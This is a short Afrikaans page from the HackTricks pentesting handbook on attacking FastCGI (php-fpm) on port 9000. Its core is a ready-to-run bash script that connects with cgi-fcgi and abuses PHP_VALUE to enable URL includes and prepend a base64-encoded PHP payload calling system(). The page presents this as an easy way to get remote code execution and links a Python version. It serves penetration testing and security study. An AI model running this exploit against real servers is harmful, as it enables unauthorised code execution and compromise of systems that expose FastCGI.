Afrikaans - Ht
HackTricks Training Twitter Linkedin Sponsor

9000 - Pentesting FastCGI

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Basiese Inligting

As jy wil leer wat FastCGI is, kyk na die volgende bladsy:

pagedisable_functions bypass - php-fpm/FastCGI

Standaard loop FastCGI op poort 9000 en word nie deur nmap herken nie. Gewoonlik luister FastCGI slegs op localhost.

RCE

Dit is baie maklik om FastCGI arbitrêre kode uit te voer:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

Of jy kan ook die volgende Python-skripsie gebruik: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Previous8333,18333,38333,18444 - Pentesting BitcoinNext9001 - Pentesting HSQLDB

Last updated